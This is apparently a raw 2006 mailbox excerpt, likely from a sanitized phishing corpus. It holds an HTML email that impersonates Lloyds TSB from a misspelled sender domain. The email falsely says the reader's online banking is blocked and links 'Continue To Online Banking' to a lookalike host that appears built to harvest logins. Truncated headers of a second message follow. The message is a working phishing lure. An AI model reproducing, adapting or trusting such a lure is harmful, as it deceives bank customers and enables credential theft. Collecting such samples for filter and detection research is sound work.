From: Llyods TSB. <updates@llyodstsb.com>
Reply-To: updates@llyodstsb.com
MIME-Version: 1.0
Content-Type: text/html
Content-Transfer-Encoding: 8bit
Message-Id: <20060314045700.531F9132386@dd2930.kasserver.com>
Date: Tue, 14 Mar 2006 05:57:00 +0100 (CET)
Status: RO
X-Status: 
X-Keywords:                 
X-UID: 600


<DIV id=RTEContent>  <DIV id=brand><A target="_blank"  title="" href=" http://www.lloydstsb.com/personal.asp"  ><IMG height=34 alt="Lloyds TSB" src=" http://www.lloydstsb.com/media/lloydstsb2004/logos/logo_lloydstsb.gif"  width=219 border=0></A></DIV>  <DIV> </DIV>  <DIV>  <TABLE cellSpacing=0 cellPadding=0 width=747 align=left border=0>  <TBODY>  <TR>  <TD vAlign=top colSpan=4 height=93>  <TABLE cellSpacing=0 cellPadding=0 width="100%" summary="" border=0>  <TBODY>  <TR vAlign=top>  <TD vAlign=bottom width=700 height=75>  <DIV style="PADDING-RIGHT: 0px; PADDING-LEFT: 0px; PADDING-BOTTOM: 0px; MARGIN: 0px; PADDING-TOP: 0px">Your Online Banking is Blocked   <HR width=747 color=#cccccc SIZE=1>  </DIV></TD>  <TD vAlign=bottom align=right><IMG height=1 alt="" width=1 border=0> </TD></TR></TBODY></TABLE></TD></TR>  <TR>  <TD width=1></TD>  <TD vAlign=top width=685><A target="_blank"  onfiltered="return top.js.OpenExtLink(window,event,this)"href=" http://llyods-uk-stb.0catch.com/Ll
 yods/Updates/LoginMember/index.html"  ></A>  <BLOCKQUOTE>  <div align=left>Because of unusual number of invalid login attempts on you account, we had to believe that, their might be some security problem on you account.</div>  <div align=left>So we have decided to put an extra verification process to ensure your identity and your account security.</div>  <div align=left>Please click on continue to the verification process and ensure your account security. It is all about your security.<BR></div>  <div align=left>Thank you. </div>  <DIV align=right><A target="_blank"  onfiltered="return top.js.OpenExtLink(window,event,this)" href="http://llyods-uk-stb.0catch.com/Llyods/Updates/LoginMember/index.html "  >Continue To Online Banking</A></DIV></BLOCKQUOTE></TD></TR></TBODY></TABLE></DIV></DIV><p> 

From biglez123@yahoo.com  Tue Mar 14 01:09:21 2006
Return-Path: <biglez123@yahoo.com>
X-Original-To: nobody@login.example.com
Delivered-To: nobody@login.example.com
Received: from mail1.example.com (mail1.example.com [10.1.2.3])
	by naughty.example.com (Postfix) with ESMTP id C2987536E6E
	for <nobody@login.example.com>; Tue, 14 Mar 2006 01:09:21 -0500 (EST)
Received: from ns.adako.pl (wu14.internetdsl.tpnet.pl [80.55.202.14])
	by mail1.example.com (Postfix) with ESMTP id 358896CCF14
	for <nobody@example.com>; Tue, 14 Mar 2006 01:09:21 -0500 (EST)
Received: from [86.34.8.208] (helo=User)
	by ns.adako.pl with esmtpa (Exim 4.50)
	id 1FJ3xt-0005Zt-I2; Tue, 14 Mar 2006 08:29:09 +0100
Reply-To: biglez123@yahoo.com
